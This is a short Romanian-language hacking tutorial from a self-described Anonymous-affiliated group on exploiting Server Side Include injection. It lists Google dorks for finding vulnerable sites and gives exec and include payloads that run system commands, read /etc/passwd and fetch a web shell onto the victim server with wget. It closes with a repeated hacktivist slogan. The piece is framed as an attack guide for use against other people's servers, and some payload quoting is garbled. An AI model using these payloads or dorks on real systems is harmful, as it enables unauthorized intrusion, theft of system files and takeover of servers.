Un atac de tip SSI (Server Side Include) face comenzi direct pe server-ul sit-ului , pentru asta trebuie sa aveti cunostinte de baza de Batch (pentru windows) sau Bash (pentru Linux)
Pentru a fi un site vulnerabil , sit-ul trebuie sa aiba extensie xshtml / shtm sau stm pe apache sau trebuie sa aiba in file config de apache un server side includes , uite cateva doork pentru google: inurl:index.shtml inurl:index.shtm inurl:index.stm
Acum trebuie sa verificam , trebuie sa trimitem o comanda in unu din spatiile astea: < !–#exec cmd=”ls” –> < !–#exec cmd=”dir” –>
Daca dupa ce verificati , ca Output este un file de sistem, inseamna ca server-ul este vulnerabil, acum va arat cateva exemple de coduri care puteti sa scrieti: Cititi /etc/passwd: <!--–#include virtual=”/etc/passwd” –--> Uploadeaza un shell : < !–#exec cmd=”wget “shell_3.php”" –>
_______________________________________ We are Anonymous! We are legion! Wait for us! We X-HackersTeam! We have the power! We want respect! X-HackersTeam is Anonymous EXPECT US !
_______________________________________ We are Anonymous! We are legion! Wait for us! We X-HackersTeam! We have the power! We want respect! X-HackersTeam is Anonymous EXPECT US !